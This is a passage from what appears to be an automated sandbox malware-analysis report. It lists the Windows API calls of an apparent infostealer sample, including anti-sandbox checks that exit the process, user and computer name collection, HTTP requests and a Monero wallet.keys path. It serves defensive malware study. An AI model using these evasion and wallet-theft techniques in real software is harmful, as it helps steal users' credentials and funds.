                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C2170), ref: 00FB98A1
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C2320), ref: 00FB98BA
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C22D8), ref: 00FB98D2
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C22F0), ref: 00FB98EA
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C2428), ref: 00FB9903
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C91B0), ref: 00FB991B
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008B5430), ref: 00FB9933
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008B52B0), ref: 00FB994C
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C2458), ref: 00FB9964
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C23F8), ref: 00FB997C
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C21A0), ref: 00FB9995
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C21B8), ref: 00FB99AD
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008B5450), ref: 00FB99C5
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C21E8), ref: 00FB99DE
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FA11D0: ExitProcess.KERNEL32 ref: 00FA1211
                                      • Part of subcall function 00FA1160: GetSystemInfo.KERNEL32(?), ref: 00FA116A
                                      • Part of subcall function 00FA1160: ExitProcess.KERNEL32 ref: 00FA117E
                                      • Part of subcall function 00FA1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FA112B
                                      • Part of subcall function 00FA1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FA1132
                                      • Part of subcall function 00FA1110: ExitProcess.KERNEL32 ref: 00FA1143
                                      • Part of subcall function 00FA1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FA123E
                                      • Part of subcall function 00FA1220: ExitProcess.KERNEL32 ref: 00FA1294
                                      • Part of subcall function 00FB6770: GetUserDefaultLangID.KERNEL32 ref: 00FB6774
                                      • Part of subcall function 00FA1190: ExitProcess.KERNEL32 ref: 00FA11C6
                                      • Part of subcall function 00FB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FA11B7), ref: 00FB7880
                                      • Part of subcall function 00FB7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FB7887
                                      • Part of subcall function 00FB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FB789F
                                      • Part of subcall function 00FB78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB7910
                                      • Part of subcall function 00FB78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FB7917
                                      • Part of subcall function 00FB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FB792F
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008C9210,?,00FC110C,?,00000000,?,00FC1110,?,00000000,00FC0AEF), ref: 00FB6ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FB6AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00FB6AF9
                                    • Sleep.KERNEL32(00001770), ref: 00FB6B04
                                    • CloseHandle.KERNEL32(?,00000000,?,008C9210,?,00FC110C,?,00000000,?,00FC1110,?,00000000,00FC0AEF), ref: 00FB6B1A
                                    • ExitProcess.KERNEL32 ref: 00FB6B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2931873225-0
                                    • Opcode ID: 76bc73b821f26c7815714a826729a4c5e0ff162470d041269ed46bf9c35bf46a
                                    • Instruction ID: d94fe48760f5b8c6de6b38cc70b4cb5206c95284343b4bb85e44306cc832fd57
                                    • Opcode Fuzzy Hash: 76bc73b821f26c7815714a826729a4c5e0ff162470d041269ed46bf9c35bf46a
                                    • Instruction Fuzzy Hash: 8A311E75D40208AAEB14FBF1DC56BEE7778AF44700F504528F212A6182DF7C9945EFA2
                                    Function 00FB6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1436 fb6af3 1437 fb6b0a 1436->1437 1439 fb6aba-fb6ad7 call fbaad0 OpenEventA 1437->1439 1440 fb6b0c-fb6b22 call fb6920 call fb5b10 CloseHandle ExitProcess 1437->1440 1446 fb6ad9-fb6af1 call fbaad0 CreateEventA 1439->1446 1447 fb6af5-fb6b04 CloseHandle Sleep 1439->1447 1446->1440 1447->1437
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008C9210,?,00FC110C,?,00000000,?,00FC1110,?,00000000,00FC0AEF), ref: 00FB6ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FB6AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00FB6AF9
                                    • Sleep.KERNEL32(00001770), ref: 00FB6B04
                                    • CloseHandle.KERNEL32(?,00000000,?,008C9210,?,00FC110C,?,00000000,?,00FC1110,?,00000000,00FC0AEF), ref: 00FB6B1A
                                    • ExitProcess.KERNEL32 ref: 00FB6B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: bd262922d666cb16050f602cb9a8ab676767e9fa97ab04573501b0895656b195
                                    • Instruction ID: 1381f5c00a461a1adf901ec0a5c8edde504468267ec1743844551405f1a5fa56
                                    • Opcode Fuzzy Hash: bd262922d666cb16050f602cb9a8ab676767e9fa97ab04573501b0895656b195
                                    • Instruction Fuzzy Hash: E4F03A70A40209EAEB10ABE2AC06BFD7B78EF44701F108525B523E6181CBBC5580EF65
                                    Function 00FA47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FA4839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00FA4849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: 6cea0bda56de05eaa53e6c97bb6e608d34f448406672bcff7860febae129fefd
                                    • Instruction ID: 3b59389b7ef6e32d5f55733424cbee8193cf784acc2a07e8c5c509c8a57dbc87
                                    • Opcode Fuzzy Hash: 6cea0bda56de05eaa53e6c97bb6e608d34f448406672bcff7860febae129fefd
                                    • Instruction Fuzzy Hash: 2A214FB1D00208ABDF14DFA5E845ADD7B78FF45320F108625F965A72C0DB746A05DF91
                                    Function 00FB51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA6280: InternetOpenA.WININET(00FC0DFE,00000001,00000000,00000000,00000000), ref: 00FA62E1
                                      • Part of subcall function 00FA6280: StrCmpCA.SHLWAPI(?,008CEB98), ref: 00FA6303
                                      • Part of subcall function 00FA6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FA6335
                                      • Part of subcall function 00FA6280: HttpOpenRequestA.WININET(00000000,GET,?,008CE268,00000000,00000000,00400100,00000000), ref: 00FA6385
                                      • Part of subcall function 00FA6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FA63BF
                                      • Part of subcall function 00FA6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FA63D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FB5228
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: 93036576c10a80020a94258cb01042359b8b17781ecfc74f1bcd083e1d454bd3
                                    • Instruction ID: 5f9455efd88d0de7b68b6d4d450b7a84057bb88efa65bbd4b8eefbe8031c3a55
                                    • Opcode Fuzzy Hash: 93036576c10a80020a94258cb01042359b8b17781ecfc74f1bcd083e1d454bd3
                                    • Instruction Fuzzy Hash: 81112E74900008BBCB14FFA1DD52EED7378AF50300F504158F91A5A592EF38AB15EE92
                                    Function 00FA1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1493 fa1220-fa1247 call fb89b0 GlobalMemoryStatusEx 1496 fa1249-fa1271 call fbda00 * 2 1493->1496 1497 fa1273-fa127a 1493->1497 1498 fa1281-fa1285 1496->1498 1497->1498 1500 fa129a-fa129d 1498->1500 1501 fa1287 1498->1501 1504 fa1289-fa1290 1501->1504 1505 fa1292-fa1294 ExitProcess 1501->1505 1504->1500 1504->1505
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FA123E
                                    • ExitProcess.KERNEL32 ref: 00FA1294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: 1c680c7d7bc014c106f4caf21c6ea18bc916022817e63d7fa5a556d6bbd04f77
                                    • Instruction ID: a84098524aff0f2f50f1cb20dfe9f39966a81d619a90599c5e6984491a6fdefe
                                    • Opcode Fuzzy Hash: 1c680c7d7bc014c106f4caf21c6ea18bc916022817e63d7fa5a556d6bbd04f77
                                    • Instruction Fuzzy Hash: 25014BF4D40308AAEB10DBE0DC49B9EBBB8BB05701F248058E605BA280D67895859B99
                                    Function 00FA1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FA112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FA1132
                                    • ExitProcess.KERNEL32 ref: 00FA1143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: 3df44f3e6012d45d3386bcec818eaf5dc76ef3160fccb789773ec8f9f392e9c6
                                    • Instruction ID: 4696714a57d3d32b8816195dc2fbfedc85f93dcf66efea9f17c945c70adb7bf2
                                    • Opcode Fuzzy Hash: 3df44f3e6012d45d3386bcec818eaf5dc76ef3160fccb789773ec8f9f392e9c6
                                    • Instruction Fuzzy Hash: 6FE0E6B4D95308FFE764ABE0AC0AF097ABCAF05B12F114154F7097B1C4D6B526809799
                                    Function 00FA10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FA10B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00FA10F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 3d743421d802eb000b85ef4ffcf2b1bd8f4e550c27a11095e901e4fd3a0a68d3
                                    • Instruction ID: ac9bec530a2d339922b0add7fbf0c0b951d0aa2e5248723ef58cb87df3b9aa83
                                    • Opcode Fuzzy Hash: 3d743421d802eb000b85ef4ffcf2b1bd8f4e550c27a11095e901e4fd3a0a68d3
                                    • Instruction Fuzzy Hash: 1DF0E9B1A41204BBE71496E4AC49FAAB7ECE705B15F304454F504E7280D5715E40DB60
                                    Function 00FA1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB7910
                                      • Part of subcall function 00FB78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FB7917
                                      • Part of subcall function 00FB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FB792F
                                      • Part of subcall function 00FB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FA11B7), ref: 00FB7880
                                      • Part of subcall function 00FB7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FB7887
                                      • Part of subcall function 00FB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FB789F
                                    • ExitProcess.KERNEL32 ref: 00FA11C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: f56a8c3d32022f961923990b1ec3cb2fe2b35a5575bc852223a12883c228fc27
                                    • Instruction ID: b1e85da93d8cdbc580a78714ede45ad2bc8cc1be715e33d2aeac48daf72d8fe8
                                    • Opcode Fuzzy Hash: f56a8c3d32022f961923990b1ec3cb2fe2b35a5575bc852223a12883c228fc27
                                    • Instruction Fuzzy Hash: D0E012B5D1430163CA1473F2BC0AB6A36DC6F95385F150434FA09D7102FA2DF841EE65

                                    Non-executed Functions

                                    Function 00FB38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00FB38CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FB38E3
                                    • lstrcat.KERNEL32(?,?), ref: 00FB3935
                                    • StrCmpCA.SHLWAPI(?,00FC0F70), ref: 00FB3947
                                    • StrCmpCA.SHLWAPI(?,00FC0F74), ref: 00FB395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FB3C67
                                    • FindClose.KERNEL32(000000FF), ref: 00FB3C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
